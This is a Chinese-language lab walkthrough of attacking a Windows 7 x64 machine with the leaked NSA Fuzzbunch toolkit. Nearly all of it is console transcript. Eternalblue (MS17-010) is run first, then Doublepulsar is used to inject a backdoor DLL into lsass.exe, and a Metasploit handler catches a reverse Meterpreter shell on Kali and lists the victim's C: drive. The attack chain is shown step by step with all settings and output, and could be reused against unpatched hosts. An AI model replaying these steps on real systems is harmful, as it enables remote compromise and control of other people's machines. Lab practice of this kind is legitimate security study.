Win7利用NSA的MS17-010漏洞利用工具攻击Win7 64并加载dll实现反弹shell给kali
实验三 Win7利用NSA的MS17-010漏洞利用工具攻击Win7 64并加载dll实现反弹shell给kali
攻击机Win7 IP:192.168.23.128
靶机Win7 64 IP:192.168.23.129
监听机kali IP:192.168.23.127
Win7利用NSA的MS17-010漏洞利用工具攻击Win7 64
C:\Users\legend\Desktop\NSA第三次泄露事件\windows\windows>python fb.py
--[ Version 3.5.1
[*] Loading Plugins
[*] Initializing Fuzzbunch v3.5.1
[*] Adding Global Variables
[+] Set ResourcesDir => D:\DSZOPSDISK\Resources
[+] Set Color => True
[+] Set ShowHiddenParameters => False
[+] Set NetworkTimeout => 60
[+] Set LogDir => D:\logs
[*] Autorun ON
ImplantConfig Autorun List
==========================
0) prompt confirm
1) execute
Exploit Autorun List
====================
0) apply
1) touch all
2) prompt confirm
3) execute
Special Autorun List
====================
0) apply
1) touch all
2) prompt confirm
3) execute
Payload Autorun List
====================
0) apply
1) prompt confirm
2) execute
[+] Set FbStorage => C:\Users\legend\Desktop\NSA第三次泄露事件\windows\windows\storage
[*] Retargetting Session
[?] Default Target IP Address [] : 192.168.23.129
[?] Default Callback IP Address [] : 192.168.23.127
[?] Use Redirection [yes] : no
[?] Base Log directory [D:\logs] : c:\logs
[*] Checking c:\logs for projects
Index Project
----- -------
0 fbtest
1 test
2 testsmb
3 testsmb2
4 testsmb3
5 testsmb4
6 yuxiaohan
7 Create a New Project
[?] Project [0] : 6
[?] Set target log directory to 'c:\logs\yuxiaohan\z192.168.23.129'? [Yes] :
[*] Initializing Global State
[+] Set TargetIp => 192.168.23.129
[+] Set CallbackIp => 192.168.23.127
[!] Redirection OFF
[+] Set LogDir => c:\logs\yuxiaohan\z192.168.23.129
[+] Set Project => yuxiaohan
fb > use Eter
Eternalblue Eternalchampion Eternalromance Eternalsynergy
fb > use Eternalblue
[!] Entering Plugin Context :: Eternalblue
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 192.168.23.129
[*] Applying Session Parameters
[*] Running Exploit Touches
[!] Enter Prompt Mode :: Eternalblue
Module: Eternalblue
===================
Name Value
---- -----
NetworkTimeout 60
TargetIp 192.168.23.129
TargetPort 445
VerifyTarget True
VerifyBackdoor True
MaxExploitAttempts 3
GroomAllocations 12
Target WIN72K8R2
[!] plugin variables are valid
[?] Prompt For Variable Settings? [Yes] :
[*] NetworkTimeout :: Timeout for blocking network calls (in seconds). Use -1 for no timeout.
[?] NetworkTimeout [60] :
[*] TargetIp :: Target IP Address
[?] TargetIp [192.168.23.129] :
[*] TargetPort :: Port used by the SMB service for exploit connection
[?] TargetPort [445] :
[*] VerifyTarget :: Validate the SMB string from target against the target selected before exploitation.
[?] VerifyTarget [True] :
[*] VerifyBackdoor :: Validate the presence of the DOUBLE PULSAR backdoor before throwing. This option must be enabled for multiple exploit attempts.
[?] VerifyBackdoor [True] :
[*] MaxExploitAttempts :: Number of times to attempt the exploit and groom. Disabled for XP/2K3.
[?] MaxExploitAttempts [3] :
[*] GroomAllocations :: Number of large SMBv2 buffers (Vista+) or SessionSetup allocations (XK/2K3) to do.
[?] GroomAllocations [12] :
[*] Target :: Operating System, Service Pack, and Architecture of target OS
0) XP Windows XP 32-Bit All Service Packs
*1) WIN72K8R2 Windows 7 and 2008 R2 32-Bit and 64-Bit All Service Packs
[?] Target [1] :
[!] Preparing to Execute Eternalblue
[*] Mode :: Delivery mechanism
*0) DANE Forward deployment via DARINGNEOPHYTE
1) FB Traditional deployment from within FUZZBUNCH
[?] Mode [0] : 1
[+] Run Mode: FB
[?] This will execute locally like traditional Fuzzbunch plugins. Are you sure? (y/n) [Yes] :
[*] Redirection OFF
[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [192.168.23.129] :
[?] Destination Port [445] :
[+] (TCP) Local 192.168.23.129:445
[+] Configure Plugin Remote Tunnels
Module: Eternalblue
===================
Name Value
---- -----
DaveProxyPort 0
NetworkTimeout 60
TargetIp 192.168.23.129
TargetPort 445
VerifyTarget True
VerifyBackdoor True
MaxExploitAttempts 3
GroomAllocations 12
ShellcodeBuffer
Target WIN72K8R2
[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[*] Connecting to target for exploitation.
[+] Connection established for exploitation.
[*] Pinging backdoor...
[+] Backdoor returned code: 10 - Success!
[+] Ping returned Target architecture: x64 (64-bit)
[+] Backdoor is already installed -- nothing to be done.
[*] CORE sent serialized output blob (2 bytes):
0x00000000 08 01 ..
[*] Received output parameters from CORE
[+] CORE terminated with status code 0x00000000
[+] Eternalblue Succeeded
fb Special (Eternalblue) >
利用Doublepulsar生成payload
fb Special (Eternalblue) > use Doublepulsar
[!] Entering Plugin Context :: Doublepulsar
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 192.168.23.129
[*] Applying Session Parameters
[!] Enter Prompt Mode :: Doublepulsar
Module: Doublepulsar
====================
Name Value
---- -----
NetworkTimeout 60
TargetIp 192.168.23.129
TargetPort 445
OutputFile
Protocol SMB
Architecture x86
Function OutputInstall
[!] Plugin Variables are NOT Valid
[?] Prompt For Variable Settings? [Yes] :
[*] NetworkTimeout :: Timeout for blocking network calls (in seconds). Use -1 for no timeout.
[?] NetworkTimeout [60] :
[*] TargetIp :: Target IP Address
[?] TargetIp [192.168.23.129] :
[*] TargetPort :: Port used by the Double Pulsar back door
[?] TargetPort [445] :
[*] Protocol :: Protocol for the backdoor to speak
*0) SMB Ring 0 SMB (TCP 445) backdoor
1) RDP Ring 0 RDP (TCP 3389) backdoor
[?] Protocol [0] :
[*] Architecture :: Architecture of the target OS
*0) x86 x86 32-bits
1) x64 x64 64-bits
[?] Architecture [0] : 1
[+] Set Architecture => x64
[*] Function :: Operation for backdoor to perform
*0) OutputInstall Only output the install shellcode to a binary file on disk.
1) Ping Test for presence of backdoor
2) RunDLL Use an APC to inject a DLL into a user mode process.
3) RunShellcode Run raw shellcode
4) Uninstall Remove's backdoor from system
[?] Function [0] : 2
[+] Set Function => RunDLL
[*] DllPayload :: DLL to inject into user mode
[?] DllPayload [] : c:\backdoor.dll
[+] Set DllPayload => c:\backdoor.dll
[*] DllOrdinal :: The exported ordinal number of the DLL being injected to call
[?] DllOrdinal [1] :
[*] ProcessName :: Name of process to inject into
[?] ProcessName [lsass.exe] :
[*] ProcessCommandLine :: Command line of process to inject into
[?] ProcessCommandLine [] :
[!] Preparing to Execute Doublepulsar
[*] Redirection OFF
[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [192.168.23.129] :
[?] Destination Port [445] :
[+] (TCP) Local 192.168.23.129:445
[+] Configure Plugin Remote Tunnels
Module: Doublepulsar
====================
Name Value
---- -----
NetworkTimeout 60
TargetIp 192.168.23.129
TargetPort 445
DllPayload c:\backdoor.dll
DllOrdinal 1
ProcessName lsass.exe
ProcessCommandLine
Protocol SMB
Architecture x64
Function RunDLL
[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[+] Selected Protocol SMB
[.] Connecting to target...
[+] Connected to target, pinging backdoor...
[+] Backdoor returned code: 10 - Success!
[+] Ping returned Target architecture: x64 (64-bit) - XOR Key: 0xF58D215B
SMB Connection string is: Windows 7 Ultimate 7600
Target OS is: 7 x64
Target SP is: 0
[+] Backdoor installed
[+] DLL built
[.] Sending shellcode to inject DLL
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Command completed successfully
[+] Doublepulsar Succeeded
fb Payload (Doublepulsar) > help
Core Commands
=============
Command Description
------- -----------
! Shortcut for shell
? Shortcut for help
autorun Set autorun mode
back Leave the current context back to the default
banner Print the startup banner
changeprompt Change the command prompt
echo Echo a message
enter Enter the context of a plugin
eof Quit program (CTRL-D)
exit Alias for back
help Print out help
history Run a previous command.
info Print information about the current context
mark Mark a session item
python Drop to an interactive Python interpreter
quit Quit fuzzbunch
redirect Configure redirection
resizeconsole None
retarget Set basic target info
script Run a script
session Show session items
setg Set a global variable
shell Execute a shell command
show Show plugin info
sleep Sleep for n seconds
standardop Print standard OP usage message
toolpaste Paste and convert data from external tool output
unsetg Unset a global variable
use Activate a plugin for use and enter context
Payload Commands
================
Command Description
------- -----------
apply Apply parameters values from session items
execute Execute the current plugin
export Export a local parameter as a global
prompt Walk through all parameters prompting for a value for each one
rendezvous Create a rendezvous input parameter
reset Reset a configuration parameter
set Set a configuration parameter
touch Run a touch plugin
validate Validate the current parameter settings
fb Payload (Doublepulsar) > execute
[!] Preparing to Execute Doublepulsar
[*] Redirection OFF
[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [192.168.23.129] :
[?] Destination Port [445] :
[+] (TCP) Local 192.168.23.129:445
[+] Configure Plugin Remote Tunnels
Module: Doublepulsar
====================
Name Value
---- -----
NetworkTimeout 60
TargetIp 192.168.23.129
TargetPort 445
DllPayload c:\backdoor.dll
DllOrdinal 1
ProcessName lsass.exe
ProcessCommandLine
Protocol SMB
Architecture x64
Function RunDLL
[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[+] Selected Protocol SMB
[.] Connecting to target...
[+] Connected to target, pinging backdoor...
[+] Backdoor returned code: 10 - Success!
[+] Ping returned Target architecture: x64 (64-bit) - XOR Key: 0xA8C69044
SMB Connection string is: Windows 7 Ultimate 7600
Target OS is: 7 x64
Target SP is: 0
[+] Backdoor installed
[+] DLL built
[.] Sending shellcode to inject DLL
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Backdoor returned code: 10 - Success!
[+] Command completed successfully
[+] Doublepulsar Succeeded
fb Payload (Doublepulsar) >
和实验一十分类似,不过设置的反弹IP是kali地址,要等待kali监听
kali监听反弹的shell
┌──(root💀kali)-[~]
└─# msfconsole
+-------------------------------------------------------+
| METASPLOIT by Rapid7 |
+---------------------------+---------------------------+
| __________________ | |
| ==c(______(o(______(_() | |""""""""""""|======[*** |
| )=\ | | EXPLOIT \ |
| // \\ | |_____________\_______ |
| // \\ | |==[msf >]============\ |
| // \\ | |______________________\ |
| // RECON \\ | \(@)(@)(@)(@)(@)(@)(@)/ |
| // \\ | ********************* |
+---------------------------+---------------------------+
| o O o | \'\/\/\/'/ |
| o O | )======( |
| o | .' LOOT '. |
| |^^^^^^^^^^^^^^|l___ | / _||__ \ |
| | PAYLOAD |""\___, | / (_||_ \ |
| |________________|__|)__| | | __||_) | |
| |(@)(@)"""**|(@)(@)**|(@) | " || " |
| = = = = = = = = = = = = | '--------------' |
+---------------------------+---------------------------+
=[ metasploit v6.1.14-dev ]
+ -- --=[ 2180 exploits - 1155 auxiliary - 399 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: View missing module options with show
missing
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcppayload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh,
thread, process, none)
LHOST yes The listen address (an interface ma
y be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > set lhost 192.168.23.127
lhost => 192.168.23.127
msf6 exploit(multi/handler) > set lport 4444
lport => 4444
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh,
thread, process, none)
LHOST 192.168.23.127 yes The listen address (an interface ma
y be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.23.127:4444
[*] Sending stage (200262 bytes) to 192.168.23.129
[*] Meterpreter session 1 opened (192.168.23.127:4444 -> 192.168.23.129:49173 ) at 2022-01-23 22:32:36 +0800
meterpreter >
可见我们拿到了反弹的shell
测试
meterpreter > ls c:\
>
Listing: c:
===========
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxr 0 dir 2009-07-14 11:18:56 +0 $Recycle.Bin
wx 800
40777/rwxrwxr 0 dir 2009-07-14 13:08:56 +0 Documents and Settings
wx 800
40777/rwxrwxr 0 dir 2009-07-14 11:20:08 +0 PerfLogs
wx 800
40555/r-xr-xr 4096 dir 2009-07-14 11:20:08 +0 Program Files
-x 800
40555/r-xr-xr 4096 dir 2009-07-14 11:20:08 +0 Program Files (x86)
-x 800
40777/rwxrwxr 4096 dir 2009-07-14 11:20:08 +0 ProgramData
wx 800
40777/rwxrwxr 0 dir 2021-10-02 10:19:33 +0 Recovery
wx 800
40777/rwxrwxr 4096 dir 2021-10-02 10:16:23 +0 System Volume Informati
wx 800 on
40555/r-xr-xr 4096 dir 2009-07-14 11:20:08 +0 Users
-x 800
40777/rwxrwxr 24576 dir 2009-07-14 11:20:08 +0 Windows
wx 800
0000/-------- 0 fif 1970-01-01 08:00:00 +0 hiberfil.sys
- 800
0000/-------- 0 fif 1970-01-01 08:00:00 +0 pagefile.sys
- 800
meterpreter >
查看靶机C盘目录成功
